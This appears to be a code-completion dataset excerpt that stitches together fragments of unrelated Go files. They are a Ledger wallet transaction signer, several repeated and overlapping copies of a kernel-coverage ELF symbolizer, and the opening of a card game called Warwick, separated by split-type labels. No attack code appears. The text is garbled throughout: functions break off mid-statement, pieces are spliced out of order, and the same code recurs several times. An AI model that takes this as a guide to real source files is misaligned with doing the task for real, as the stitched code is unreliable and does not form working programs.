return strReceiverAddress, bigIntAmount, data, nil
}
// signTransaction sends the tx to Ledger for user confirmation and signing
func signTransaction(tx *transaction, nanos *ledger.NanoS) error {
toSign, err := json.Marshal(tx)
if err != nil {
return err
} | log.Println(errSigningTx)
return err
}
sigHex := hex.EncodeToString(signature)
tx.Signature = sigHex
return nil
}
// broadcastTransaction broadcasts the transaction in the network
func broadcastTransaction(tx transaction) error {
jsonTx, _ := json.Marshal(&tx)
resp, err := http.Post(fmt.Sprintf("%s/transaction/send", proxyHost), "",
strings.NewReader(string(jsonTx)))
if err != nil {
log.Println(errSendingTx)
return err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
log.Println(errSendingTx)
return err
}
res := string(body)
fmt.Printf("Result: %s\n\r", res)
return nil
}
// getAccountAndAddressIndexFromUser retrieves the account and address index from user
func getAccountAndAddressIndexFromUser() (uint32, uint32, error) {
reader := bufio.NewReader(os.Stdin)
fmt.Print("Account: ")
strAccount, _ := reader.ReadString('\n')
strAccount = strings.TrimSpace(strAccount)
account, err := strconv.ParseUint(strAccount, 10, 32)
if err != nil {
return 0, 0, err
}
fmt.Print("Address index: ")
strAddressIndex, _ := reader.ReadString('\n')
strAddressIndex = strings.TrimSpace(strAddressIndex)
addressIndex, err := strconv.ParseUint(strAddressIndex, 10, 32)
if err != nil {
return 0, 0, err
}
return uint32(account), uint32(addressIndex), nil
}
func waitInputAndExit() {
fmt.Println("Press enter to continue...")
_, _ = fmt.Scanln()
os.Exit(1)
}
// main function
func main() {
log.SetFlags(0)
// opening connection with the Ledger device
var nanos *ledger.NanoS
nanos, err := ledger.OpenNanoS()
if err != nil {
log.Println(errOpenDevice | fmt.Println("Signing transaction. Please confirm on your Ledger")
signature, err := nanos.SignTx(toSign)
if err != nil { | random_line_split |
elf.go | }
unit.Name, unit.Path = cleanPath(unit.Name, objDir, srcDir, buildDir)
units[nunit] = unit
nunit++
}
units = units[:nunit]
if len(symbols) == 0 || len(units) == 0 {
return nil, fmt.Errorf("failed to parse DWARF (set CONFIG_DEBUG_INFO=y?)")
}
impl := &Impl{
Units: units,
Symbols: symbols,
Symbolize: func(pcs []uint64) ([]Frame, error) {
return symbolize(target, objDir, srcDir, buildDir, kernelObject, pcs)
},
RestorePC: func(pc uint32) uint64 {
return PreviousInstructionPC(target, RestorePC(pc, uint32(textAddr>>32)))
},
}
return impl, nil
}
type pcRange struct {
start uint64
end uint64
unit *CompileUnit
}
func buildSymbols(symbols []*Symbol, ranges []pcRange, coverPoints [2][]uint64) []*Symbol {
// Assign coverage point PCs to symbols.
// Both symbols and coverage points are sorted, so we do it one pass over both.
selectPCs := func(u *ObjectUnit, typ int) *[]uint64 {
return [2]*[]uint64{&u.PCs, &u.CMPs}[typ]
}
for pcType := range coverPoints {
pcs := coverPoints[pcType]
var curSymbol *Symbol
firstSymbolPC, symbolIdx := -1, 0
for i := 0; i < len(pcs); i++ {
pc := pcs[i]
for ; symbolIdx < len(symbols) && pc >= symbols[symbolIdx].End; symbolIdx++ {
}
var symb *Symbol
if symbolIdx < len(symbols) && pc >= symbols[symbolIdx].Start && pc < symbols[symbolIdx].End {
symb = symbols[symbolIdx]
}
if curSymbol != nil && curSymbol != symb {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:i]
firstSymbolPC = -1
}
curSymbol = symb
if symb != nil && firstSymbolPC == -1 {
firstSymbolPC = i
}
}
if curSymbol != nil {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:]
}
}
// Assign compile units to symbols based on unit pc ranges.
// Do it one pass as both are sorted.
nsymbol := 0
rangeIndex := 0
for _, s := range symbols {
for ; rangeIndex < len(ranges) && ranges[rangeIndex].end <= s.Start; rangeIndex++ {
}
if rangeIndex == len(ranges) || s.Start < ranges[rangeIndex].start || len(s.PCs) == 0 {
continue // drop the symbol
}
unit := ranges[rangeIndex].unit
s.Unit = unit
symbols[nsymbol] = s
nsymbol++
}
symbols = symbols[:nsymbol]
for pcType := range coverPoints {
for _, s := range symbols {
symbPCs := selectPCs(&s.ObjectUnit, pcType)
unitPCs := selectPCs(&s.Unit.ObjectUnit, pcType)
pos := len(*unitPCs)
*unitPCs = append(*unitPCs, *symbPCs...)
*symbPCs = (*unitPCs)[pos:]
}
}
return symbols
}
func readSymbols(file *elf.File) ([]*Symbol, uint64, uint64, map[uint64]bool, error) {
text := file.Section(".text")
if text == nil {
return nil, 0, 0, nil, fmt.Errorf("no .text section in the object file")
}
allSymbols, err := file.Symbols()
if err != nil {
return nil, 0, 0, nil, fmt.Errorf("failed to read ELF symbols: %v", err)
}
traceCmp := make(map[uint64]bool)
var tracePC uint64
var symbols []*Symbol
for _, symb := range allSymbols {
if symb.Value < text.Addr || symb.Value+symb.Size > text.Addr+text.Size {
continue
}
symbols = append(symbols, &Symbol{
ObjectUnit: ObjectUnit{
Name: symb.Name,
},
Start: symb.Value,
End: symb.Value + symb.Size,
})
if strings.HasPrefix(symb.Name, "__sanitizer_cov_trace_") {
if symb.Name == "__sanitizer_cov_trace_pc" {
tracePC = symb.Value
} else {
traceCmp[symb.Value] = true
}
}
}
if tracePC == 0 {
return nil, 0, 0, nil, fmt.Errorf("no __sanitizer_cov_trace_pc symbol in the object file")
}
sort.Slice(symbols, func(i, j int) bool {
return symbols[i].Start < symbols[j].Start
})
return symbols, text.Addr, tracePC, traceCmp, nil
}
func readTextRanges(file *elf.File) ([]pcRange, []*CompileUnit, error) {
text := file.Section(".text")
if text == nil {
return nil, nil, fmt.Errorf("no .text section in the object file")
}
kaslr := file.Section(".rela.text") != nil
debugInfo, err := file.DWARF()
if err != nil {
return nil, nil, fmt.Errorf("failed to parse DWARF: %v (set CONFIG_DEBUG_INFO=y?)", err)
}
var ranges []pcRange
var units []*CompileUnit
for r := debugInfo.Reader(); ; {
ent, err := r.Next()
if err != nil {
return nil, nil, err
}
if ent == nil {
break
}
if ent.Tag != dwarf.TagCompileUnit {
return nil, nil, fmt.Errorf("found unexpected tag %v on top level", ent.Tag)
}
attrName := ent.Val(dwarf.AttrName)
if attrName == nil {
continue
}
unit := &CompileUnit{
ObjectUnit: ObjectUnit{
Name: attrName.(string),
},
}
units = append(units, unit)
ranges1, err := debugInfo.Ranges(ent)
if err != nil {
return nil, nil, err
}
for _, r := range ranges1 {
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
if kaslr {
// Linux kernel binaries with CONFIG_RANDOMIZE_BASE=y are strange.
// .text starts at 0xffffffff81000000 and symbols point there as well,
// but PC ranges point to addresses around 0.
// So try to add text offset and retry the check.
// It's unclear if we also need some offset on top of text.Addr,
// it gives approximately correct addresses, but not necessary precisely
// correct addresses.
r[0] += text.Addr
r[1] += text.Addr
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
continue
}
}
}
ranges = append(ranges, pcRange{r[0], r[1], unit})
}
r.SkipChildren()
}
sort.Slice(ranges, func(i, j int) bool {
return ranges[i].start < ranges[j].start
})
return ranges, units, nil
}
func symbolize(target *targets.Target, objDir, srcDir, buildDir, obj string, pcs []uint64) ([]Frame, error) {
procs := runtime.GOMAXPROCS(0) / 2
if need := len(pcs) / 1000; procs > need {
procs = need
}
const (
minProcs = 1
maxProcs = 4
)
// addr2line on a beefy vmlinux takes up to 1.6GB of RAM, so don't create too many of them.
if procs > maxProcs {
procs = maxProcs
}
if procs < minProcs {
procs = minProcs
}
type symbolizerResult struct {
frames []symbolizer.Frame
err error
}
symbolizerC := make(chan symbolizerResult, procs)
pcchan := make(chan []uint64, procs)
for p := 0; p < procs; p++ {
go func() {
symb := symbolizer.NewSymbolizer(target)
defer symb.Close()
var res symbolizerResult
for pcs := range pcchan {
frames, err := symb.SymbolizeArray(obj, pcs)
if err != nil {
res.err = fmt.Errorf("failed | for _, unit := range units {
if len(unit.PCs) == 0 {
continue // drop the unit | random_line_split | |
elf.go | Symbols(symbols []*Symbol, ranges []pcRange, coverPoints [2][]uint64) []*Symbol {
// Assign coverage point PCs to symbols.
// Both symbols and coverage points are sorted, so we do it one pass over both.
selectPCs := func(u *ObjectUnit, typ int) *[]uint64 {
return [2]*[]uint64{&u.PCs, &u.CMPs}[typ]
}
for pcType := range coverPoints {
pcs := coverPoints[pcType]
var curSymbol *Symbol
firstSymbolPC, symbolIdx := -1, 0
for i := 0; i < len(pcs); i++ {
pc := pcs[i]
for ; symbolIdx < len(symbols) && pc >= symbols[symbolIdx].End; symbolIdx++ {
}
var symb *Symbol
if symbolIdx < len(symbols) && pc >= symbols[symbolIdx].Start && pc < symbols[symbolIdx].End {
symb = symbols[symbolIdx]
}
if curSymbol != nil && curSymbol != symb {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:i]
firstSymbolPC = -1
}
curSymbol = symb
if symb != nil && firstSymbolPC == -1 {
firstSymbolPC = i
}
}
if curSymbol != nil {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:]
}
}
// Assign compile units to symbols based on unit pc ranges.
// Do it one pass as both are sorted.
nsymbol := 0
rangeIndex := 0
for _, s := range symbols {
for ; rangeIndex < len(ranges) && ranges[rangeIndex].end <= s.Start; rangeIndex++ {
}
if rangeIndex == len(ranges) || s.Start < ranges[rangeIndex].start || len(s.PCs) == 0 {
continue // drop the symbol
}
unit := ranges[rangeIndex].unit
s.Unit = unit
symbols[nsymbol] = s
nsymbol++
}
symbols = symbols[:nsymbol]
for pcType := range coverPoints {
for _, s := range symbols {
symbPCs := selectPCs(&s.ObjectUnit, pcType)
unitPCs := selectPCs(&s.Unit.ObjectUnit, pcType)
pos := len(*unitPCs)
*unitPCs = append(*unitPCs, *symbPCs...)
*symbPCs = (*unitPCs)[pos:]
}
}
return symbols
}
func readSymbols(file *elf.File) ([]*Symbol, uint64, uint64, map[uint64]bool, error) {
text := file.Section(".text")
if text == nil {
return nil, 0, 0, nil, fmt.Errorf("no .text section in the object file")
}
allSymbols, err := file.Symbols()
if err != nil {
return nil, 0, 0, nil, fmt.Errorf("failed to read ELF symbols: %v", err)
}
traceCmp := make(map[uint64]bool)
var tracePC uint64
var symbols []*Symbol
for _, symb := range allSymbols {
if symb.Value < text.Addr || symb.Value+symb.Size > text.Addr+text.Size {
continue
}
symbols = append(symbols, &Symbol{
ObjectUnit: ObjectUnit{
Name: symb.Name,
},
Start: symb.Value,
End: symb.Value + symb.Size,
})
if strings.HasPrefix(symb.Name, "__sanitizer_cov_trace_") {
if symb.Name == "__sanitizer_cov_trace_pc" {
tracePC = symb.Value
} else {
traceCmp[symb.Value] = true
}
}
}
if tracePC == 0 {
return nil, 0, 0, nil, fmt.Errorf("no __sanitizer_cov_trace_pc symbol in the object file")
}
sort.Slice(symbols, func(i, j int) bool {
return symbols[i].Start < symbols[j].Start
})
return symbols, text.Addr, tracePC, traceCmp, nil
}
func readTextRanges(file *elf.File) ([]pcRange, []*CompileUnit, error) {
text := file.Section(".text")
if text == nil {
return nil, nil, fmt.Errorf("no .text section in the object file")
}
kaslr := file.Section(".rela.text") != nil
debugInfo, err := file.DWARF()
if err != nil {
return nil, nil, fmt.Errorf("failed to parse DWARF: %v (set CONFIG_DEBUG_INFO=y?)", err)
}
var ranges []pcRange
var units []*CompileUnit
for r := debugInfo.Reader(); ; {
ent, err := r.Next()
if err != nil {
return nil, nil, err
}
if ent == nil {
break
}
if ent.Tag != dwarf.TagCompileUnit {
return nil, nil, fmt.Errorf("found unexpected tag %v on top level", ent.Tag)
}
attrName := ent.Val(dwarf.AttrName)
if attrName == nil {
continue
}
unit := &CompileUnit{
ObjectUnit: ObjectUnit{
Name: attrName.(string),
},
}
units = append(units, unit)
ranges1, err := debugInfo.Ranges(ent)
if err != nil {
return nil, nil, err
}
for _, r := range ranges1 {
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
if kaslr {
// Linux kernel binaries with CONFIG_RANDOMIZE_BASE=y are strange.
// .text starts at 0xffffffff81000000 and symbols point there as well,
// but PC ranges point to addresses around 0.
// So try to add text offset and retry the check.
// It's unclear if we also need some offset on top of text.Addr,
// it gives approximately correct addresses, but not necessary precisely
// correct addresses.
r[0] += text.Addr
r[1] += text.Addr
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
continue
}
}
}
ranges = append(ranges, pcRange{r[0], r[1], unit})
}
r.SkipChildren()
}
sort.Slice(ranges, func(i, j int) bool {
return ranges[i].start < ranges[j].start
})
return ranges, units, nil
}
func | (target *targets.Target, objDir, srcDir, buildDir, obj string, pcs []uint64) ([]Frame, error) {
procs := runtime.GOMAXPROCS(0) / 2
if need := len(pcs) / 1000; procs > need {
procs = need
}
const (
minProcs = 1
maxProcs = 4
)
// addr2line on a beefy vmlinux takes up to 1.6GB of RAM, so don't create too many of them.
if procs > maxProcs {
procs = maxProcs
}
if procs < minProcs {
procs = minProcs
}
type symbolizerResult struct {
frames []symbolizer.Frame
err error
}
symbolizerC := make(chan symbolizerResult, procs)
pcchan := make(chan []uint64, procs)
for p := 0; p < procs; p++ {
go func() {
symb := symbolizer.NewSymbolizer(target)
defer symb.Close()
var res symbolizerResult
for pcs := range pcchan {
frames, err := symb.SymbolizeArray(obj, pcs)
if err != nil {
res.err = fmt.Errorf("failed to symbolize: %v", err)
}
res.frames = append(res.frames, frames...)
}
symbolizerC <- res
}()
}
for i := 0; i < len(pcs); {
end := i + 100
if end > len(pcs) {
end = len(pcs)
}
pcchan <- pcs[i:end]
i = end
}
close(pcchan)
var err0 error
var frames []Frame
for p := 0; p < procs; p++ {
res := <-symbolizerC
if res.err != nil {
err0 = res.err
}
for _, frame := range res.frames {
name, path := cleanPath(frame.File, objDir, srcDir, buildDir)
frames = append(frames, Frame{
PC: frame.PC,
Name: name,
Path: path,
Range: Range{
StartLine: frame.Line,
StartCol: 0,
EndLine: frame.Line,
EndCol: LineEnd,
| symbolize | identifier_name |
elf.go | Symbols(symbols []*Symbol, ranges []pcRange, coverPoints [2][]uint64) []*Symbol {
// Assign coverage point PCs to symbols.
// Both symbols and coverage points are sorted, so we do it one pass over both.
selectPCs := func(u *ObjectUnit, typ int) *[]uint64 {
return [2]*[]uint64{&u.PCs, &u.CMPs}[typ]
}
for pcType := range coverPoints {
pcs := coverPoints[pcType]
var curSymbol *Symbol
firstSymbolPC, symbolIdx := -1, 0
for i := 0; i < len(pcs); i++ {
pc := pcs[i]
for ; symbolIdx < len(symbols) && pc >= symbols[symbolIdx].End; symbolIdx++ {
}
var symb *Symbol
if symbolIdx < len(symbols) && pc >= symbols[symbolIdx].Start && pc < symbols[symbolIdx].End {
symb = symbols[symbolIdx]
}
if curSymbol != nil && curSymbol != symb {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:i]
firstSymbolPC = -1
}
curSymbol = symb
if symb != nil && firstSymbolPC == -1 {
firstSymbolPC = i
}
}
if curSymbol != nil {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:]
}
}
// Assign compile units to symbols based on unit pc ranges.
// Do it one pass as both are sorted.
nsymbol := 0
rangeIndex := 0
for _, s := range symbols {
for ; rangeIndex < len(ranges) && ranges[rangeIndex].end <= s.Start; rangeIndex++ {
}
if rangeIndex == len(ranges) || s.Start < ranges[rangeIndex].start || len(s.PCs) == 0 {
continue // drop the symbol
}
unit := ranges[rangeIndex].unit
s.Unit = unit
symbols[nsymbol] = s
nsymbol++
}
symbols = symbols[:nsymbol]
for pcType := range coverPoints {
for _, s := range symbols {
symbPCs := selectPCs(&s.ObjectUnit, pcType)
unitPCs := selectPCs(&s.Unit.ObjectUnit, pcType)
pos := len(*unitPCs)
*unitPCs = append(*unitPCs, *symbPCs...)
*symbPCs = (*unitPCs)[pos:]
}
}
return symbols
}
func readSymbols(file *elf.File) ([]*Symbol, uint64, uint64, map[uint64]bool, error) {
text := file.Section(".text")
if text == nil {
return nil, 0, 0, nil, fmt.Errorf("no .text section in the object file")
}
allSymbols, err := file.Symbols()
if err != nil {
return nil, 0, 0, nil, fmt.Errorf("failed to read ELF symbols: %v", err)
}
traceCmp := make(map[uint64]bool)
var tracePC uint64
var symbols []*Symbol
for _, symb := range allSymbols {
if symb.Value < text.Addr || symb.Value+symb.Size > text.Addr+text.Size {
continue
}
symbols = append(symbols, &Symbol{
ObjectUnit: ObjectUnit{
Name: symb.Name,
},
Start: symb.Value,
End: symb.Value + symb.Size,
})
if strings.HasPrefix(symb.Name, "__sanitizer_cov_trace_") {
if symb.Name == "__sanitizer_cov_trace_pc" {
tracePC = symb.Value
} else {
traceCmp[symb.Value] = true
}
}
}
if tracePC == 0 {
return nil, 0, 0, nil, fmt.Errorf("no __sanitizer_cov_trace_pc symbol in the object file")
}
sort.Slice(symbols, func(i, j int) bool {
return symbols[i].Start < symbols[j].Start
})
return symbols, text.Addr, tracePC, traceCmp, nil
}
func readTextRanges(file *elf.File) ([]pcRange, []*CompileUnit, error) {
text := file.Section(".text")
if text == nil {
return nil, nil, fmt.Errorf("no .text section in the object file")
}
kaslr := file.Section(".rela.text") != nil
debugInfo, err := file.DWARF()
if err != nil {
return nil, nil, fmt.Errorf("failed to parse DWARF: %v (set CONFIG_DEBUG_INFO=y?)", err)
}
var ranges []pcRange
var units []*CompileUnit
for r := debugInfo.Reader(); ; {
ent, err := r.Next()
if err != nil {
return nil, nil, err
}
if ent == nil {
break
}
if ent.Tag != dwarf.TagCompileUnit {
return nil, nil, fmt.Errorf("found unexpected tag %v on top level", ent.Tag)
}
attrName := ent.Val(dwarf.AttrName)
if attrName == nil {
continue
}
unit := &CompileUnit{
ObjectUnit: ObjectUnit{
Name: attrName.(string),
},
}
units = append(units, unit)
ranges1, err := debugInfo.Ranges(ent)
if err != nil {
return nil, nil, err
}
for _, r := range ranges1 {
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
if kaslr {
// Linux kernel binaries with CONFIG_RANDOMIZE_BASE=y are strange.
// .text starts at 0xffffffff81000000 and symbols point there as well,
// but PC ranges point to addresses around 0.
// So try to add text offset and retry the check.
// It's unclear if we also need some offset on top of text.Addr,
// it gives approximately correct addresses, but not necessary precisely
// correct addresses.
r[0] += text.Addr
r[1] += text.Addr
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
continue
}
}
}
ranges = append(ranges, pcRange{r[0], r[1], unit})
}
r.SkipChildren()
}
sort.Slice(ranges, func(i, j int) bool {
return ranges[i].start < ranges[j].start
})
return ranges, units, nil
}
func symbolize(target *targets.Target, objDir, srcDir, buildDir, obj string, pcs []uint64) ([]Frame, error) | symbolizerC := make(chan symbolizerResult, procs)
pcchan := make(chan []uint64, procs)
for p := 0; p < procs; p++ {
go func() {
symb := symbolizer.NewSymbolizer(target)
defer symb.Close()
var res symbolizerResult
for pcs := range pcchan {
frames, err := symb.SymbolizeArray(obj, pcs)
if err != nil {
res.err = fmt.Errorf("failed to symbolize: %v", err)
}
res.frames = append(res.frames, frames...)
}
symbolizerC <- res
}()
}
for i := 0; i < len(pcs); {
end := i + 100
if end > len(pcs) {
end = len(pcs)
}
pcchan <- pcs[i:end]
i = end
}
close(pcchan)
var err0 error
var frames []Frame
for p := 0; p < procs; p++ {
res := <-symbolizerC
if res.err != nil {
err0 = res.err
}
for _, frame := range res.frames {
name, path := cleanPath(frame.File, objDir, srcDir, buildDir)
frames = append(frames, Frame{
PC: frame.PC,
Name: name,
Path: path,
Range: Range{
StartLine: frame.Line,
StartCol: 0,
EndLine: frame.Line,
EndCol: LineEnd,
| {
procs := runtime.GOMAXPROCS(0) / 2
if need := len(pcs) / 1000; procs > need {
procs = need
}
const (
minProcs = 1
maxProcs = 4
)
// addr2line on a beefy vmlinux takes up to 1.6GB of RAM, so don't create too many of them.
if procs > maxProcs {
procs = maxProcs
}
if procs < minProcs {
procs = minProcs
}
type symbolizerResult struct {
frames []symbolizer.Frame
err error
} | identifier_body |
elf.go | Unit, pcType) = pcs[firstSymbolPC:i]
firstSymbolPC = -1
}
curSymbol = symb
if symb != nil && firstSymbolPC == -1 {
firstSymbolPC = i
}
}
if curSymbol != nil {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:]
}
}
// Assign compile units to symbols based on unit pc ranges.
// Do it one pass as both are sorted.
nsymbol := 0
rangeIndex := 0
for _, s := range symbols {
for ; rangeIndex < len(ranges) && ranges[rangeIndex].end <= s.Start; rangeIndex++ {
}
if rangeIndex == len(ranges) || s.Start < ranges[rangeIndex].start || len(s.PCs) == 0 {
continue // drop the symbol
}
unit := ranges[rangeIndex].unit
s.Unit = unit
symbols[nsymbol] = s
nsymbol++
}
symbols = symbols[:nsymbol]
for pcType := range coverPoints {
for _, s := range symbols {
symbPCs := selectPCs(&s.ObjectUnit, pcType)
unitPCs := selectPCs(&s.Unit.ObjectUnit, pcType)
pos := len(*unitPCs)
*unitPCs = append(*unitPCs, *symbPCs...)
*symbPCs = (*unitPCs)[pos:]
}
}
return symbols
}
func readSymbols(file *elf.File) ([]*Symbol, uint64, uint64, map[uint64]bool, error) {
text := file.Section(".text")
if text == nil {
return nil, 0, 0, nil, fmt.Errorf("no .text section in the object file")
}
allSymbols, err := file.Symbols()
if err != nil {
return nil, 0, 0, nil, fmt.Errorf("failed to read ELF symbols: %v", err)
}
traceCmp := make(map[uint64]bool)
var tracePC uint64
var symbols []*Symbol
for _, symb := range allSymbols {
if symb.Value < text.Addr || symb.Value+symb.Size > text.Addr+text.Size {
continue
}
symbols = append(symbols, &Symbol{
ObjectUnit: ObjectUnit{
Name: symb.Name,
},
Start: symb.Value,
End: symb.Value + symb.Size,
})
if strings.HasPrefix(symb.Name, "__sanitizer_cov_trace_") {
if symb.Name == "__sanitizer_cov_trace_pc" {
tracePC = symb.Value
} else {
traceCmp[symb.Value] = true
}
}
}
if tracePC == 0 {
return nil, 0, 0, nil, fmt.Errorf("no __sanitizer_cov_trace_pc symbol in the object file")
}
sort.Slice(symbols, func(i, j int) bool {
return symbols[i].Start < symbols[j].Start
})
return symbols, text.Addr, tracePC, traceCmp, nil
}
func readTextRanges(file *elf.File) ([]pcRange, []*CompileUnit, error) {
text := file.Section(".text")
if text == nil {
return nil, nil, fmt.Errorf("no .text section in the object file")
}
kaslr := file.Section(".rela.text") != nil
debugInfo, err := file.DWARF()
if err != nil {
return nil, nil, fmt.Errorf("failed to parse DWARF: %v (set CONFIG_DEBUG_INFO=y?)", err)
}
var ranges []pcRange
var units []*CompileUnit
for r := debugInfo.Reader(); ; {
ent, err := r.Next()
if err != nil {
return nil, nil, err
}
if ent == nil {
break
}
if ent.Tag != dwarf.TagCompileUnit {
return nil, nil, fmt.Errorf("found unexpected tag %v on top level", ent.Tag)
}
attrName := ent.Val(dwarf.AttrName)
if attrName == nil {
continue
}
unit := &CompileUnit{
ObjectUnit: ObjectUnit{
Name: attrName.(string),
},
}
units = append(units, unit)
ranges1, err := debugInfo.Ranges(ent)
if err != nil {
return nil, nil, err
}
for _, r := range ranges1 {
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
if kaslr {
// Linux kernel binaries with CONFIG_RANDOMIZE_BASE=y are strange.
// .text starts at 0xffffffff81000000 and symbols point there as well,
// but PC ranges point to addresses around 0.
// So try to add text offset and retry the check.
// It's unclear if we also need some offset on top of text.Addr,
// it gives approximately correct addresses, but not necessary precisely
// correct addresses.
r[0] += text.Addr
r[1] += text.Addr
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
continue
}
}
}
ranges = append(ranges, pcRange{r[0], r[1], unit})
}
r.SkipChildren()
}
sort.Slice(ranges, func(i, j int) bool {
return ranges[i].start < ranges[j].start
})
return ranges, units, nil
}
func symbolize(target *targets.Target, objDir, srcDir, buildDir, obj string, pcs []uint64) ([]Frame, error) {
procs := runtime.GOMAXPROCS(0) / 2
if need := len(pcs) / 1000; procs > need {
procs = need
}
const (
minProcs = 1
maxProcs = 4
)
// addr2line on a beefy vmlinux takes up to 1.6GB of RAM, so don't create too many of them.
if procs > maxProcs {
procs = maxProcs
}
if procs < minProcs {
procs = minProcs
}
type symbolizerResult struct {
frames []symbolizer.Frame
err error
}
symbolizerC := make(chan symbolizerResult, procs)
pcchan := make(chan []uint64, procs)
for p := 0; p < procs; p++ {
go func() {
symb := symbolizer.NewSymbolizer(target)
defer symb.Close()
var res symbolizerResult
for pcs := range pcchan {
frames, err := symb.SymbolizeArray(obj, pcs)
if err != nil {
res.err = fmt.Errorf("failed to symbolize: %v", err)
}
res.frames = append(res.frames, frames...)
}
symbolizerC <- res
}()
}
for i := 0; i < len(pcs); {
end := i + 100
if end > len(pcs) {
end = len(pcs)
}
pcchan <- pcs[i:end]
i = end
}
close(pcchan)
var err0 error
var frames []Frame
for p := 0; p < procs; p++ {
res := <-symbolizerC
if res.err != nil {
err0 = res.err
}
for _, frame := range res.frames {
name, path := cleanPath(frame.File, objDir, srcDir, buildDir)
frames = append(frames, Frame{
PC: frame.PC,
Name: name,
Path: path,
Range: Range{
StartLine: frame.Line,
StartCol: 0,
EndLine: frame.Line,
EndCol: LineEnd,
},
})
}
}
if err0 != nil {
return nil, err0
}
return frames, nil
}
// readCoverPoints finds all coverage points (calls of __sanitizer_cov_trace_pc) in the object file.
// Currently it is amd64-specific: looks for e8 opcode and correct offset.
// Running objdump on the whole object file is too slow.
func readCoverPoints(file *elf.File, tracePC uint64, traceCmp map[uint64]bool) ([2][]uint64, error) {
var pcs [2][]uint64
text := file.Section(".text")
if text == nil {
return pcs, fmt.Errorf("no .text section in the object file")
}
data, err := text.Data()
if err != nil {
return pcs, fmt.Errorf("failed to read .text: %v", err)
}
const callLen = 5
end := len(data) - callLen + 1
for i := 0; i < end; i++ {
pos := bytes.IndexByte(data[i:end], 0xe8)
if pos == -1 | {
break
} | conditional_block | |
warwick.go | open a spot that may be immediately filled from the draw, discard or hand, 2: refill that spot, 3: add another, 4: refill both
Discard vs. Trash
There are two face up piles where cards go after they're used. When building, cards go into the discard. The Market buildings
allow you to draw from the discard pile (you must draw from the top of the pile. You may not look through the pile). When
using the Market buildings you may be able to trash cards to draw cards--cards that go into the trash may never be retrieved.
Soldiers go into the trash when they're used.
Turn order:
1. Build or Upgrade
2. Attack (optional, if Soldier recruited)
3. Store (optional, if Storage built)
4. Trash (optional, if Market built)
5. Hand limit is 5, draw up to 2, or discard
- or -
Trash all cards in hand, and draw the number trashed.
Building and Upgrading:
To build a level 3 building, you need to discard 3 cards. Buildings are built using wood, metal, or stone.
There are buildings that make other buildings made of certain materials cheaper to build. For instance, an Exchange (made of wood)
costs 3, but if you have a Carpentry, it will only cost you 2. If you have a Carpentry and a Sawmill, it will only cost you 1!
Buildings can also be upgraded. If you have a building of one level (say level 1), you can lay the building
of level 2 on top of it (but not the building of level 3 or 4!). That counts as a build, but doesn't cost you
anything.
To start:
Each player gets 5 cards.
*/
package main
import (
"fmt"
"math/rand"
"time"
"github.com/chrislunt/warwick/card"
"github.com/chrislunt/warwick/player"
)
var logLevel = 2
func log(level int, message string) {
if logLevel >= level {
fmt.Println(message);
}
}
func turnToPhase(turn int) (phase int) {
if turn > 6 {
phase = 2
} else if turn > 3 {
phase = 1
} else {
phase = 0
}
return
}
func store(storePower int, stock *card.Hand, discardPile *card.Hand, player *player.Player, phase int) {
var topSpot int
switch {
case storePower == 1 || storePower == 2:
// the player may choose from hand, discard or stock to fill the storage
// if the spot is open, you may refill it
topSpot = 0
case storePower == 3 || storePower == 4:
// a second storage spot opens, fill from stock, discard or hand
// for a 4, refill either open storage spots
topSpot = 1
}
for spot := 0; spot <= topSpot; spot++ {
if (*player).Tableau.Storage[spot] == nil {
storeCard := (*player).ChooseStore(stock, discardPile, phase)
log(1, fmt.Sprintf("Stored in storage %d: %s", spot, storeCard))
(*player).Tableau.Storage[spot] = storeCard
}
}
}
func buildStock() (stock card.Hand, stockSize int) {
rand.Seed( time.Now().UTC().UnixNano() )
// double the deck. This is the canonical reference of all cards.
var allCards = append(card.Deck[:], card.Deck[:]...)
stockSize = len(allCards)
// the stock, which can shrink, is a reference to all cards
stock.Cards = make([]*card.Card, stockSize)
stock.PullPos = stockSize - 1 // the position representing the current position to draw from
/* There are two ways we could randomize, one would be randomize the stock and keep a pointer of where we currently are,
which has an up-front randomization cost, but all subsequent pulls are cheap.
*/
// TODO make this a parameter
testStockId := -1
var permutation []int
if testStockId != -1 {
/* rather than having to specify the whole deck, I allow you to only specify the top of the deck */
fillSize := stockSize - len(card.TestStock[testStockId])
fillOut := rand.Perm(fillSize)
// for easier reading I specify the TestStock in reverse order, so get it ready to go on top
s := card.TestStock[testStockId]
for i, j := 0, len(s)-1; i < j; i, j = i+1, j-1 {
s[i], s[j] = s[j], s[i]
}
permutation = append(fillOut[0:fillSize], card.TestStock[testStockId]...);
} else {
permutation = rand.Perm(stockSize)
}
for i, v := range permutation {
stock.Cards[i] = &allCards[v]
}
return
}
func main() |
// initialize the players
for id := range players {
players[id].Hand = &card.Hand{}
players[id].Hand.Limit = 5
players[id].Hand.Max = 7
// create the hand with an extra 2 slots beyond the limit, which could happen
// if you use a soldier and then do an exchange
players[id].Hand.Cards = make([]*card.Card, players[id].Hand.Max)
// do the initial draw of 5 cards
stock.RandomPull(5, players[id].Hand)
// initize the Tableaus. The Tableau is a map indexed by a card type constant
// the map points to a small hand which is the potential stack of cards as someone upgrades
// there are 10 types of cards, plus 2 storage spots so each slot must be initialized
players[id].Tableau = &card.Tableau{}
players[id].Tableau.Stack = make(map[int] *card.Hand)
players[id].Tableau.Discounts = make([]int, 4)
players[id].Tableau.BuildBonus = 0
players[id].Tableau.AttackBonus = 0
